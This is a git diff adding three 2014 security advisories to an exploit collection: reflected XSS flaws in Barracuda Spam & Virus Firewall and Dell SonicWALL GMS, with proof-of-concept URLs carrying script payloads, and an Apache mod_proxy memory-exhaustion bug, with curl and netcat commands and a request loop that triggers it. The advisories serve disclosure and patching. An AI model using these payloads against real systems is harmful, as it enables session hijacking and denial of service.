optionalg
diff --git a/‎1407-exploits/VL-890.txt‎
Lines changed: 174 additions & 0 deletions b/‎1407-exploits/VL-890.txt‎
Lines changed: 174 additions & 0 deletions
diff --git a/‎1407-exploits/cve-2014-0117.txt‎
Lines changed: 162 additions & 0 deletions b/‎1407-exploits/cve-2014-0117.txt‎
Lines changed: 162 additions & 0 deletions
diff --git a/‎1407-exploits/dellsonicwallanalyzer-xss.txt‎
Lines changed: 42 additions & 0 deletions b/‎1407-exploits/dellsonicwallanalyzer-xss.txt‎
Lines changed: 42 additions & 0 deletions
@@ -0,0 +1,174 @@
+Document Title:
+===============
+Barracuda Networks Spam&Virus Firewall v6.0.2 (600 & Vx) - Client Side Cross Site Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=890
+
+Barracuda Networks Security ID (BNSEC): BNSEC-1176
+https://www.barracuda.com/support/knowledgebase/501600000013gvh
+
+Solution #00006521
+BNSEC-01176: Authenticated non-persistent XSS in Barracuda Spam and Virus Firewall v6.0.2
+
+
+Release Date:
+=============
+2014-07-21
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+890
+
+
+Common Vulnerability Scoring System:
+====================================
+2.3
+
+
+Product & Service Introduction:
+===============================
+Barracuda Networks, Inc. is a privately held company providing security, networking and storage products based on network appliances and 
+cloud services. The company’s security products include products for protection against email, web surfing, web hackers and instant messaging 
+threats such as spam, spyware, trojans, and viruses. The company`s networking and storage products include web filtering, load balancing, 
+application delivery controllers, message archiving, NG firewalls, backup services and data protection.
+
+(Copy of the Vendor Homepage: https://www.barracudanetworks.com/products/spamandvirusfirewall/models)
+
+
+Abstract Advisory Information:
+==============================
+An independent researcher (Ebrahim Hegazy) discovered a client side cross site vulnerability in the Barracuda Networks Spam & Virus Firewall 5.1.0.012 Appliance.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2013-10-26:	Researcher Notification & Coordination (Ebrahim Hegazy)
+2013-11-27:	Vendor Notification (Barracuda Networks - Bug Bounty Team)
+2013-12-03:	Vendor Response/Feedback (Barracuda Networks - Bug Bounty Team)
+2014-00-00:	Vendor Fix/Patch (Barracuda Networks - Developer Team)
+2014-00-00:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Barracuda Networks
+Product: Spam & Virus Firewall 5.1.0.012 (Model 600)
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A non persistent cross site scripting vulnerability has been discovered in the official Barracuda Networks Spam&Virus Firewall 600 v5.1.0.x Appliance Application.
+The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions informaton by client-side cross site scripting requests.
+
+The vulnerability is located in the main `index.cgi` module of the appliance. The vulnerable application GET values are `auth_type`, `primary_tab` and `secoundary_tab`. 
+The client-side script code execution occurs in the `index.cgi` after processing to click the client-side manipulated link with the cross site scripting payload. 
+The attack vector of the vulnerability is located on the client-side of the appliance service. The request method to inject the script code is `GET`.
+
+The security risk of the non-persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.3.
+Exploitation of the client-side remote vulnerability requires low or medium user interaction and no privileged application user account. Successful exploitation results 
+in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of appliance application- or connected modules.
+
+Vulnerable Service(s):
+                          [+] Barracuda Networks - Spam & Virus Firewall 600 v5.1.0.x [BUG BOUNTY: http://spam.ptest.cudasvc.com]
+
+Vulnerable Module(s):
+                          [+] ../cgi-mod/index.cgi
+
+Vulnerable Parameter(s):
+                          [+] auth_type
+                          [+] primary_tab
+                          [+] secondary_tab
+
+Affected Section(s):
+			  [+] Index - Tab Listings
+
+
+Proof of Concept (PoC):
+=======================
+The client side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account and
+with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information 
+and steps below to continue.
+
+Service: Bug Bounty Server (ptest)
+Seriennummer: #BAR-SF-362525
+Firmware: v5.1.0.012 (2011-10-27 11:34:08)
+Modell:V600 
+
+1- primary_tab
+2- auth_type
+3- secondary_tab
+
+PoC: Service Link with client-side injected Payload
+http://spam.ptest.cudasvc.com/cgi-mod/index.cgi?primary_tab=1%27-alert%28document.location%29-%27//&secondary_tab=quarantine_setup&realm=
+%0D&auth_type=Local&user=guest&password=0dc15354daf5236353adf547cf675a49&et=1361818196&role=%0D&locale=en_US&q=
+%0D&UPDATE_scana_per_user=Yes&save=Save+Changes&UPDATE_scana_quarantine_addr=fdhdf&UPDATE_scana_quarantine_tag=[QUAR]
+&UPDATE_scana_quarantine_reply_addr=postmaster@barracudanetworks.com&UPDATE_quarantine_inbox_url=
+%0D&UPDATE_quarantine_enable_default=No&UPDATE_scana_use_default_domain=No&UPDATE_scana_quarantine_notify=Daily&UPDATE_notification_time=15%3
+a35&UPDATE_outbound_dusage_use_size_limit=No&UPDATE_outbound_dusage_size_limit=1024000&UPDATE_outbound_dusage_use_age_limit=Yes&UPDATE_outbou
+nd_dusage_age_limit=30&UPDATE_user_quarantine_notify=Never&UPDATE_outbound_notification_time=15%3a35&UPDATE_user_quarantine_email_address=%0D
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerable function and script context should be filtered when processing to encode meta characters in client-side user inputs. 
+Especially when the context will be prepared to reflect inside of the main page index.cgi context.
+
+
+Security Risk:
+==============
+The security risk of the client-side cross site scripting web vulnerabilities are estimated as medium(-).
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Ebrahim Hegazy [ebrahim@evolution-sec.com] (www.vulnerability-lab.com)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either 
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers 
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even 
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation 
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break 
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    dev.vulnerability-db.com	 	- forum.vulnerability-db.com 		       		- magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
@@ -0,0 +1,162 @@
+    :::    :::::::::    :::     :::::::: :::    :::::::::::::  :::    :::::::::::::::::::::::::::::::::: :::::::::  
+  :+: :+:  :+:    :+: :+: :+:  :+:    :+::+:    :+::+:         :+:    :+:    :+:        :+:    :+:    :+::+:    :+: 
+ +:+   +:+ +:+    +:++:+   +:+ +:+       +:+    +:++:+         +:+    +:+    +:+        +:+    +:+    +:++:+    +:+ 
++#++:++#++:+#++:++#++#++:++#++:+#+       +#++:++#+++#++:++#    +#++:++#++    +#+        +#+    +#++:++#+ +#+    +:+ 
++#+     +#++#+      +#+     +#++#+       +#+    +#++#+         +#+    +#+    +#+        +#+    +#+       +#+    +#+ 
+#+#     #+##+#      #+#     #+##+#    #+##+#    #+##+#         #+#    #+#    #+#        #+#    #+#       #+#    #+# 
+###     ######      ###     ### ######## ###    #############  ###    ###    ###        ###    ###       #########  
+
+ :::::::: :::     :::::::::::::       ::::::::  :::::::   :::    :::             :::::::   :::    :::::::::::::: 
+:+:    :+::+:     :+::+:             :+:    :+::+:   :+::+:+:   :+:             :+:   :+::+:+:  :+:+::+:     :+: 
++:+       +:+     +:++:+                   +:+ +:+  :+:+  +:+  +:+ +:+          +:+  :+:+  +:+    +:+       +:+  
++#+       +#+     +:++#++:++#  #++:++    +#+   +#+ + +:+  +#+ +#+  +:+  #++:+++  #+ + +:+  +#+    +#+      +#+   
++#+        +#+   +#+ +#+               +#+     +#+#  +#+  +#++#+#+#+#+#+        +#+#  +#+  +#+    +#+     +#+    
+#+#    #+#  #+#+#+#  #+#              #+#      #+#   #+#  #+#      #+#          #+#   #+#  #+#    #+#    #+#     
+ ########     ###    ##########      ########## ####### #######    ###           ####### ##############  ###     
+
++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+
++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+
+
+
+Hi there,
+
+Software: apache httpd 2.4.7 , possibly others from 2.3 and 2.4 branches.
+
+If apache is configured with mod_proxy module (for example in front of
+a tomcat, or proxypassing requests to other backend servers), it is possible
+to use all available memory on the server and potenatially cause an OOM
+condition that requires a reboot. In our tests, a single requests was causing
+apache to spin and keep allocating memory (gigabytes in seconds). A simple bash
+script that does this X time can speed the process up.
+
+Bug can be triggered in request or response.
+
+PoC (request):
+-- cut --
+curl -H 'Connection: ;' http://127.0.0.1/
+-- cut --
+
+PoC (response):
+printf "HTTP/1.1 200 OK\r\nConnection: ;\r\n\r\n" | nc -l -p 80
+
+
+Example config to replicate it, in httpd.conf :
+-- cut --
+<Proxy balancer://mycluster>
+  BalancerMember http://127.0.0.1:8100
+</Proxy>
+ProxyPass / balancer://mycluster
+-- cut --
+
+then listen on port 8100 :
+-- cut --
+nc -l -p 8100
+-- cut --
+
+Then send a request with "Connection: ;" header and watch the memory usage.
+-- cut --
+curl -H 'Connection: ;' http://127.0.0.1/
+-- cut --
+
+Single request will usually get killed with the following message:
+-- cut --
+[crit] Memory allocation failed, aborting process.
+[core:notice] [pid 3205:tid 139786428621120] AH00051: child pid 4212 exit signal Aborted (6), possible coredump in
+-- cut --
+
+hence it may be more visible  on machines with huge ram by running more requests, ideally
+concurrently but this should do as well for demonstration purposes:
+-- cut --
+for i in `seq 1 100` ; do curl -m 1 -H 'Connection: ;' http://127.0.0.1/ ; done 
+-- cut --
+
+
+Now where the problem is : incorrect parsing in find_conn_headers , it only moves 
+the pointer when it encounters a comma, and calls ap_get_token which returns an empty
+string as it skips over ';'. 
+
+
+// key == 'Connection'
+// val == ';'
+
+static int find_conn_headers(void *data, const char *key, const char *val)
+{
+    header_connection *x = data;
+    const char *name;
+
+    do {
+        while (*val == ',') {                  // jump over expected comma separator
+            val++;               
+        }
+        name = ap_get_token(x->pool, &val, 0); // returns empty string in our case 
+        if (!strcasecmp(name, "close")) {      // not mached, branch not taken
+            x->closed = 1;
+        }
+        if (!x->first) {                      // branch taken 
+            x->first = name;                  // "" as name is empty 
+        }
+        else {                                // branch not taken due to above 
+            const char **elt;
+            if (!x->array) {
+                x->array = apr_array_make(x->pool, 4, sizeof(char *));
+            }
+            elt = apr_array_push(x->array);
+            *elt = name;
+        }
+    } while (*val);                        // val is still ';'
+
+    return 1;
+}
+
+/* Retrieve a token, spacing over it and returning a pointer to
+ * the first non-white byte afterwards.  Note that these tokens
+ * are delimited by semis and commas; and can also be delimited
+ * by whitespace at the caller's option.
+ */
+
+AP_DECLARE(char *) ap_get_token(apr_pool_t *p, const char **accept_line,
+                                int accept_white)
+{
+    const char *ptr = *accept_line;
+    const char *tok_start;
+    char *token;
+    int tok_len;
+
+    /* Find first non-white byte */
+
+    while (apr_isspace(*ptr))
+        ++ptr;
+
+    tok_start = ptr;                          // ';'
+
+    /* find token end, skipping over quoted strings.
+     * (comments are already gone).
+     */
+
+    while (*ptr && (accept_white || !apr_isspace(*ptr))
+           && *ptr != ';' && *ptr != ',') {   // not satisfied as ';'
+        if (*ptr++ == '"')                    // skips the if itself
+            while (*ptr)
+                if (*ptr++ == '"')
+                    break;
+    }
+
+    tok_len = ptr - tok_start;                    // 0
+    token = apr_pstrndup(p, tok_start, tok_len);  // token = ""
+
+    /* Advance accept_line pointer to the next non-white byte */
+
+    while (apr_isspace(*ptr))                    // not a space
+        ++ptr;
+
+    *accept_line = ptr;
+    return token;
+}
+
+
+We hope you enjoyed it.
+
+Regards,
+Marek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466
+
+
@@ -0,0 +1,42 @@
+I. VULNERABILITY
+-------------------------
+Reflected XSS  vulnerabilities in DELL SonicWALL GMS 7.2 Build: 7221.1701
+
+II. BACKGROUND
+-------------------------
+Dell® SonicWALL® provides intelligent network security and data protection
+solutions that enable customers and partners to dynamically secure,
+control, and scale their global networks.
+
+III. DESCRIPTION
+-------------------------
+Has been detected a Reflected XSS vulnerability in DELL SonicWALL GMS.
+The code injection is done through the parameter "node_id" in the page
+“/sgms/panelManager?level=1&typeOfUnits=2&node_name=GlobalView&node_id=(HERE
+XSS)”
+
+IV. PROOF OF CONCEPT
+-------------------------
+The application does not validate the parameter “node_ID” correctly.
+https://10.200.210.222:8443/sgms/panelManager?level=1&typeOfUnits=2&node_name=GlobalView&node_id=aaaaaaa'</script><body
+onload=alert(document.cookie)>&panelidz=0,4#tabs-4
+
+V. BUSINESS IMPACT
+-------------------------
+An attacker can execute arbitrary HTML or script code in a targeted
+user's browser, that allows the execution of arbitrary HTML/script code to
+be executed in the context of the victim user's browser allowing Cookie
+Theft/Session Hijacking, thus enabling full access the box.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+Tested DELL SonicWALL Analyzer v7.2 (build 7220.1700)
+
+VII. SOLUTION
+-------------------------
+https://support.software.dell.com/product-notification/128245
+
+By William Costa
+william.costa@gmail.com
+
+